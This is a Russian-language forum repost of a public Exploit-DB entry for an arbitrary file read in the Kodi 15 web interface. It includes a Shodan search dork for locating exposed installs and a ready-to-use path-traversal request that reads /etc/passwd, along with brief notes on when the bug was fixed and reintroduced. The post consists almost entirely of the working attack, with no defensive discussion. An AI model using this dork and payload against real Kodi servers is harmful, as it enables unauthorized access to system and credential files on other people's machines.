Exploit Kodi 15 - Web Interface Arbitrary File Access

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
38833
Проверка EDB
  1. Пройдено
Автор
MACHIEL PRONK
Тип уязвимости
WEBAPPS
Платформа
LINUX
CVE
null
Дата публикации
2015-12-01
Kodi 15 - Web Interface Arbitrary File Access
Код:
# Exploit Title: arbitrary file access kodi web interface
# Shodan dork: title:kodi
# Date: 25-11-2015
# Contact: https://twitter.com/mpronk89
# Software Link: http://kodi.tv/
# Original report: http://forum.kodi.tv/showthread.php?tid=144110&pid=2170305#pid2170305
# Version: v15
# Tested on: linux
# CVE : n/a

kodi web interface vulnerable to arbitrary file read.

example:
<ip>:<port:/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd


for passwd

(issue fixed in 2012, reintroduced in february 2015. Fixed again november
2015 for v16)
 
Источник
www.exploit-db.com

Похожие темы